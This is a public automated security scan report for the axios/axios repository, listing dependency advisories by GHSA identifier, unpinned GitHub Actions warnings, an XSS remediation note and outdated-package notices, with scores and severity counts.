Public scan — anyone with this URL can view this analysis. Sign up to track your own repos privately, run scheduled re-scans, and get AI fix prompts via your dashboard.
Sign up free Scan another repo
28 of your 191 findings came from Repobility's proprietary detections. ✓ Repobility tags below mark them.

Scan timing: clone 2.33s · analysis 20.97s · 2.7 MB · GitHub API rate-limit (preflight)

axios/axios

https://github.com/axios/axios · scanned 2026-06-05 04:17 UTC (3 hours, 32 minutes ago) · 10 languages

351 findings (191 legacy + 160 scanner) 60th percentile · Javascript · small (2-20K LoC) Scanner says 80 (lower by 2)

File as issue Image v2 schema
UNIFIED Repobility · multi-layer engine · AI coders

Complete repo analysis

Last scanned 3 hours, 32 minutes ago · v2 · 271 findings from 2 sources. Findings combine the legacy security pipeline AND the multi-layer engine (atlas, wiring, flows, ranked) AND verified AI agent contributions.

JSON
Combined
78.4
/100
Repobility
77
191 legacy
9-layer
80
77.8% cov · 80 gaps
Critical
29
click to filter
Agents
6
0 votes
Crowd
0
reported
Score breakdown â 2026-05-18-v5
Component Sub-score Weight Contribution
structure_score 100.0 0.15 15.00
security_score 52.3 0.25 13.07
testing_score 90.0 0.20 18.00
documentation_score 87.6 0.15 13.14
practices_score 73.0 0.15 10.95
code_quality 76.1 0.10 7.61
Overall 1.00 77.8
Severity distribution — click a segment to filter
Active filters: excluding tests × Reset all
Severity: Critical 29 High 86 Medium 57 Low 87 9-Layer: Software Security Quality Integrity Frontend Hardware Data Network Cicd Source: Legacy 191 9-layer 80 Crowd 0 Layer: Quality 21 Security 3 Software 226 Api 1 Frontend 16 Cicd 4
Scan summary Repository scanned at 80.0/100 with 77.8% coverage. It contains 1066 nodes across 2 cross-layer flows, written primarily in mixed languages. Engine surfaced 80 findings — concentrated in software (50), frontend (16), quality (8). Risk profile is low: 0 critical, 0 high, 3 medium. Recommended next step: open the software layer findings first — that's where the highest-impact wins live.

Showing 242 of 271 findings. Click TP / FP to vote on a finding's accuracy — votes adjust the confidence weighting and improve detection across the platform.

critical Legacy software dependency conf 0.88 babel-traverse: GHSA-67hx-6x53-jw92
Babel vulnerable to arbitrary code execution when compiling specifically crafted malicious code
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 basic-ftp: GHSA-5rq4-664w-9x2c
Basic FTP has Path Traversal Vulnerability in its downloadToDir() method
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 cipher-base: GHSA-cpq7-6gpm-g9rc
cipher-base is missing type checks, leading to hash rewind and passing on crafted data
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 elliptic: GHSA-vjh7-7g9h-fjfh
Elliptic's private key extraction in ECDSA upon signing a malformed input (e.g. a string)
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 form-data: GHSA-fjxv-7rqg-78g4
form-data uses unsafe random function in form-data for choosing boundary
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 handlebars: GHSA-2w6w-674q-4c4q
Handlebars.js has JavaScript Injection via AST Type Confusion
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 pbkdf2: GHSA-h7cp-r72f-jxh6
pbkdf2 returns predictable uninitialized/zero-filled memory for non-normalized or unimplemented algos
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 pbkdf2: GHSA-v62p-rq8g-8h59
pbkdf2 silently disregards Uint8Array input, returning static keys
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 sha.js: GHSA-95m3-7q98-8xr5
sha.js is missing type checks leading to hash rewind and passing on crafted data
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-248r-7h7q-cr24
vm2 Has a Sandbox Breakout Using Async Generator
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-47x8-96vw-5wg6
vm2 Access to Host Object Enables Sandbox Escape
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-55hx-c926-fr95
VM2 Has a Sandbox Escape Issue via SuppressedError
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-6j2x-vhqr-qr7q
vm2 sandbox escape via JSPI-backed Promise `.finally()` species bypass
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-76w7-j9cq-rx2j
vm2 is Vulnerable to Sandbox Breakout Through Promise Species
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-8hg8-63c5-gwmx
vm2 NodeVM `nesting: true` bypasses `require: false` allowing sandbox escape and arbitrary OS command execution
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-99p7-6v5w-7xg8
vm2 has a Sandbox Escape
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-9qj6-qjgg-37qq
vm2 has sandbox breakout via `neutralizeArraySpeciesBatch`
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-9vg3-4rfj-wgcm
vm2 has Sandbox Breakout Through Null Proto Exception
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-cchq-frgv-rjh5
vm2 Sandbox Escape vulnerability
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-g644-9gfx-q4q4
vm2 Sandbox Escape vulnerability
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-grj5-jjm8-h35p
VM2 Sandbox Breakout Through __lookupGetter__
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-qcp4-v2jj-fjx8
vm2 has a Sandbox Escape Vulnerability
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-qvjj-29qf-hp7p
VM2 Has Sandbox Breakout Through Promise Species
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-rp36-8xq3-r6c4
NodeVM builtin denylist bypass via process and inspector/promises allows host code execution
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-v37h-5mfm-c47c
VM2 Has Sandbox Breakout Through Inspect Function
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-v6mx-mf47-r5wg
vm2 has a Sandbox Escape issue
package-lock.json dependencylegacy
critical Legacy software dependency conf 0.88 vm2: GHSA-vwrp-x96c-mhwq
vm2: Mutable Proxies for Host Intrinsic Prototypes Allows Sandbox Escape
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 @babel/plugin-transform-modules-systemjs: GHSA-fv7c-fp4j-7gwp
@babel/plugin-transform-modules-systemjs generates arbitrary code when compiling malicious input
package-lock.json dependencylegacy
low Legacy software xss conf 1.00 [SEC040] innerHTML XSS — template literal with server-supplied data: Setting .innerHTML with a template literal that interpolates server-supplied or user-supplied data is the canonical stored/reflected XSS vector. The browser parses the HTML and executes any <script> or event-handler attributes in the data. CWE-79. Especially dangerous when the data comes from a CV parser, profile field, or any user-input pipeline.
For plain text: use el.textContent = data.value (auto-escapes). For HTML you need to render: el.innerHTML = DOMPurify.sanitize(html). For React/Vue/Svelte: stop using innerHTML; use the framework's binding. When data comes from CV/PDF parsers, sanitize at the parser boundary too.
gulpfile.js:62 xsslegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/publish.yml:18 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/update-sponsor-block.yml:20 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:31 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/checkout` pinned to mutable ref `@v6`
`uses: actions/checkout@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:30 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/dependency-review-action` pinned to mutable ref `@v4`
`uses: actions/dependency-review-action@v4` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:51 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/publish.yml:20 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/update-sponsor-block.yml:28 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:35 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `actions/setup-node` pinned to mutable ref `@v6`
`uses: actions/setup-node@v6` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:32 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `github/codeql-action/analyze` pinned to mutable ref `@v4`
`uses: github/codeql-action/analyze@v4` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:60 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `github/codeql-action/init` pinned to mutable ref `@v4`
`uses: github/codeql-action/init@v4` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/run-ci.yml:54 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `peter-evans/create-pull-request` pinned to mutable ref `@v7`
`uses: peter-evans/create-pull-request@v7` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/update-sponsor-block.yml:49 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `peter-evans/create-pull-request` pinned to mutable ref `@v7`
`uses: peter-evans/create-pull-request@v7` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:59 dependencylegacy
high Legacy software dependency conf 0.90 ✓ Repobility Action `phips28/gh-action-bump-version` pinned to mutable ref `@v9`
`uses: phips28/gh-action-bump-version@v9` resolves at workflow-run time. Tags and branches can be re-pushed by the action owner; that made the tj-actions/changed-files compromise (2025) instantly affect ~23K repos. Pin to a 40-char commit SHA + lock with Dependabot or renovate.
.github/workflows/release-branch.yml:40 dependencylegacy
high Legacy software dependency conf 0.88 basic-ftp: GHSA-6v7q-wjvx-w8wg
basic-ftp: Incomplete CRLF Injection Protection Allows Arbitrary FTP Command Execution via Credentials and MKD Commands
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 basic-ftp: GHSA-rp42-5vxx-qpwr
basic-ftp vulnerable to denial of service via unbounded memory consumption in Client.list()
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 basic-ftp: GHSA-rpmf-866q-6p89
basic-ftp allows a malicious FTP server to cause client-side denial of service via unbounded multiline control response buffering
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 braces: GHSA-grv7-fg5c-xmjg
Uncontrolled resource consumption in braces
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 browserify-sign: GHSA-x9w5-v3q2-3rhw
browserify-sign upper bound check issue in `dsaVerify` leads to a signature forgery attack
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 cross-spawn: GHSA-3xgq-45jj-v275
Regular Expression Denial of Service (ReDoS) in cross-spawn
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 dicer: GHSA-wm7h-9275-46v2
Crash in HeaderParser in dicer
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 flatted: GHSA-25h7-pfq9-p65f
flatted vulnerable to unbounded recursion DoS in parse() revive phase
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 flatted: GHSA-rf6f-7fwh-wjgh
Prototype Pollution via parse() in NodeJS flatted
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 glob: GHSA-5j98-mcp5-4vw2
glob CLI: Command injection via -c/--cmd executes matches with shell:true
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 handlebars: GHSA-3mfm-83xf-c92r
Handlebars.js has JavaScript Injection via AST Type Confusion by tampering @partial-block
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 handlebars: GHSA-9cx6-37pm-9jff
Handlebars.js has Denial of Service via Malformed Decorator Syntax in Template Compilation
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 handlebars: GHSA-xhpv-hc6g-r9c6
Handlebars.js has JavaScript Injection via AST Type Confusion when passing an object as dynamic partial
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 handlebars: GHSA-xjpj-3mr7-gcpf
Handlebars.js has JavaScript Injection in CLI Precompiler via Unescaped Names and Options
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 http-cache-semantics: GHSA-rc47-6667-2j5j
http-cache-semantics vulnerable to Regular Expression Denial of Service
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 ip: GHSA-2p57-rm9w-gvfp
ip SSRF improper categorization in isPublic
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 lodash: GHSA-r5fr-rjxr-66jc
lodash vulnerable to Code Injection via `_.template` imports key names
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 minimatch: GHSA-23c5-xmqv-rm74
minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 minimatch: GHSA-3ppc-4f35-3m26
minimatch has a ReDoS via repeated wildcards with non-matching literal in pattern
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 minimatch: GHSA-7r86-cg39-jmmj
minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 multer: GHSA-44fp-w29j-9vj5
Multer vulnerable to Denial of Service via memory leaks from unclosed streams
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 multer: GHSA-4pg4-qvpc-4q3h
Multer vulnerable to Denial of Service from maliciously crafted requests
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 multer: GHSA-5528-5vmv-3xc2
Multer Vulnerable to Denial of Service via Uncontrolled Recursion
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 multer: GHSA-fjgf-rc76-4x9p
Multer vulnerable to Denial of Service via unhandled exception from malformed request
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 multer: GHSA-g5hg-p3ph-g8qg
Multer vulnerable to Denial of Service via unhandled exception
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 multer: GHSA-v52c-386h-88mc
Multer vulnerable to Denial of Service via resource exhaustion
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 multer: GHSA-xf7r-hgr6-v32p
Multer vulnerable to Denial of Service via incomplete cleanup
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 node-forge: GHSA-2328-f5f3-gj25
Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation)
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 node-forge: GHSA-5m6q-g25r-mvwx
Forge has Denial of Service via Infinite Loop in BigInteger.modInverse() with Zero Input
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 node-forge: GHSA-ppp5-5v6c-4jwp
Forge has signature forgery in RSA-PKCS due to ASN.1 extra field
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 node-forge: GHSA-q67f-28xg-22rw
Forge has signature forgery in Ed25519 due to missing S > L check
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 path-to-regexp: GHSA-37ch-88jc-xwx2
path-to-regexp vulnerable to Regular Expression Denial of Service via multiple route parameters
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 path-to-regexp: GHSA-9wv6-86v2-598j
path-to-regexp outputs backtracking regular expressions
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 path-to-regexp: GHSA-rhx6-c78j-4q9w
path-to-regexp contains a ReDoS
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 picomatch: GHSA-c2c7-rcm5-vvqj
Picomatch has a ReDoS vulnerability via extglob quantifiers
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 rollup: GHSA-gcx4-mw62-g8wm
DOM Clobbering Gadget found in rollup bundled scripts that leads to XSS
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 rollup: GHSA-mw96-cpmx-2vgc
Rollup 4 has Arbitrary File Write via Path Traversal
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 semver-regex: GHSA-44c6-4v22-4mhx
semver-regex Regular Expression Denial of Service (ReDOS)
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 semver: GHSA-c2qf-rxjj-qqgw
semver vulnerable to Regular Expression Denial of Service
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 serialize-javascript: GHSA-5c6j-r48x-rmvq
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 socket.io-parser: GHSA-677m-j7p3-52f9
socket.io allows an unbounded number of binary attachments
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-34x7-hfp2-rc4v
node-tar Vulnerable to Arbitrary File Creation/Overwrite via Hardlink Path Traversal
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-3jfq-g458-7qm9
Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-5955-9wpr-37jh
Arbitrary File Creation/Overwrite on Windows via insufficient relative path sanitization
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-83g3-92jg-28cx
Arbitrary File Read/Write via Hardlink Target Escape Through Symlink Chain in node-tar Extraction
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-8qq5-rm4j-mr97
node-tar is Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-9ppj-qmqm-q256
node-tar Symlink Path Traversal via Drive-Relative Linkpath
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-qffp-2rhf-9h96
tar has Hardlink Path Traversal via Drive-Relative Linkpath
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tar: GHSA-r6q2-hw4h-h46w
Race Condition in node-tar Path Reservations via Unicode Ligature Collisions on macOS APFS
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 tmp: GHSA-ph9p-34f9-6g65
tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 vm2: GHSA-6785-pvv7-mvg7
vm2 Sandbox Access to Host Buffer.alloc Allows timeout Bypass Resulting in Memory Exhaustion
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 vm2: GHSA-c4cf-2hgv-2qv6
vm2's Bridge Proxy set trap ignores receiver parameter, enabling host object property injection via prototype chain
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 vm2: GHSA-hw58-p9xv-2mjh
vm2 has a Sandbox Escape via Promise Constructor Unhandled Rejection (Process Crash DoS)
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 vm2: GHSA-m5q2-4fm3-vfqp
vm2 has a sandbox escape via unblocked cross-realm Symbol.for keys + missing bridge write-trap symbol checks
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 vm2: GHSA-r9pm-gxmw-wv6p
NodeVM network builtin exclusions bypass via internal _http_client and _http_server
package-lock.json dependencylegacy
high Legacy software dependency conf 0.88 ws: GHSA-3h5v-q93c-6h6q
ws affected by a DoS when handling a request with many HTTP headers
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 @babel/helpers: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 @babel/runtime: GHSA-968p-4wvh-cqc8
Babel has inefficient RegExp complexity in generated code with .replace when transpiling named capturing groups
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 @octokit/plugin-paginate-rest: GHSA-h5c3-5r3r-rr8q
@octokit/plugin-paginate-rest has a Regular Expression in iterator Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 @octokit/request-error: GHSA-xx4v-prfh-6cgc
@octokit/request-error has a Regular Expression in index that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 @octokit/request: GHSA-rmvr-2pp2-xj38
@octokit/request has a Regular Expression in fetchWrapper that Leads to ReDoS Vulnerability Due to Catastrophic Backtracking
package-lock.json dependencylegacy
medium Legacy security auth conf 0.92 [AUC001] No Repobility access matrix policy found: The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
The repository uses web/API frameworks but does not define .repobility/access.yml or equivalent authorization documentation.
authlegacy
medium Legacy software dependency conf 0.88 ajv: GHSA-2g4f-4pwh-qvx6
ajv has ReDoS when using `$data` option
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 ajv: GHSA-v88g-cgmw-v5xw
Prototype Pollution in Ajv
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 bn.js: GHSA-378v-28hj-76wf
bn.js affected by an infinite loop
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 brace-expansion: GHSA-f886-m6hf-6m8v
brace-expansion: Zero-step sequence causes process hang and memory exhaustion
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 follow-redirects: GHSA-r4q5-vmmm-2653
follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 got: GHSA-pfrx-2q88-qq97
Got allows a redirect to a UNIX socket
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 handlebars: GHSA-2qvq-rjwj-gvw9
Handlebars.js has Prototype Pollution Leading to XSS through Partial Template Injection
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 handlebars: GHSA-7rx3-28cr-v5wh
Handlebars.js has a Prototype Method Access Control Gap via Missing __lookupSetter__ Blocklist Entry
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 ip-address: GHSA-v2v4-37r5-5v8g
ip-address has XSS in Address6 HTML-emitting methods
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 js-yaml: GHSA-mh29-5h37-fv8m
js-yaml has prototype pollution in merge (<<)
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 lodash: GHSA-f23m-r3pf-42rh
lodash vulnerable to Prototype Pollution via array path bypass in `_.unset` and `_.omit`
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 lodash: GHSA-xxjr-mmjv-4gpg
Lodash has Prototype Pollution Vulnerability in `_.unset` and `_.omit` functions
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.88 micromatch: GHSA-952p-6rrq-rcjv
Regular Expression Denial of Service (ReDoS) in micromatch
package-lock.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@commitlint/cli` is 4 major version(s) behind (17.8.1 -> 21.0.2)
`@commitlint/cli` is pinned/resolved at 17.8.1 but the latest stable release on the npm registry is 21.0.2 (4 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@commitlint/config-conventional` is 4 major version(s) behind (17.8.1 -> 21.0.2)
`@commitlint/config-conventional` is pinned/resolved at 17.8.1 but the latest stable release on the npm registry is 21.0.2 (4 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-up…
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@release-it/conventional-changelog` is 6 major version(s) behind (5.1.1 -> 11.0.1)
`@release-it/conventional-changelog` is pinned/resolved at 5.1.1 but the latest stable release on the npm registry is 11.0.1 (6 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-…
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-alias` is 1 major version(s) behind (5.1.0 -> 6.0.0)
`@rollup/plugin-alias` is pinned/resolved at 5.1.0 but the latest stable release on the npm registry is 6.0.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-babel` is 2 major version(s) behind (5.3.1 -> 7.1.0)
`@rollup/plugin-babel` is pinned/resolved at 5.3.1 but the latest stable release on the npm registry is 7.1.0 (2 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-commonjs` is 14 major version(s) behind (15.1.0 -> 29.0.3)
`@rollup/plugin-commonjs` is pinned/resolved at 15.1.0 but the latest stable release on the npm registry is 29.0.3 (14 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PR…
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-json` is 2 major version(s) behind (4.1.0 -> 6.1.0)
`@rollup/plugin-json` is pinned/resolved at 4.1.0 but the latest stable release on the npm registry is 6.1.0 (2 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-multi-entry` is 3 major version(s) behind (4.1.0 -> 7.1.0)
`@rollup/plugin-multi-entry` is pinned/resolved at 4.1.0 but the latest stable release on the npm registry is 7.1.0 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PR…
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `@rollup/plugin-node-resolve` is 7 major version(s) behind (9.0.0 -> 16.0.3)
`@rollup/plugin-node-resolve` is pinned/resolved at 9.0.0 but the latest stable release on the npm registry is 16.0.3 (7 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update …
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `body-parser` is 1 major version(s) behind (1.20.3 -> 2.2.2)
`body-parser` is pinned/resolved at 1.20.3 but the latest stable release on the npm registry is 2.2.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `c8` is 1 major version(s) behind (10.1.3 -> 11.0.0)
`c8` is pinned/resolved at 10.1.3 but the latest stable release on the npm registry is 11.0.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `chalk` is 3 major version(s) behind (2.4.2 -> 5.6.2)
`chalk` is pinned/resolved at 2.4.2 but the latest stable release on the npm registry is 5.6.2 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `cross-env` is 3 major version(s) behind (7.0.3 -> 10.1.0)
`cross-env` is pinned/resolved at 7.0.3 but the latest stable release on the npm registry is 10.1.0 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json dependencylegacy
medium Legacy software dependency conf 0.90 npm package `express` is 1 major version(s) behind (4.21.1 -> 5.2.1)
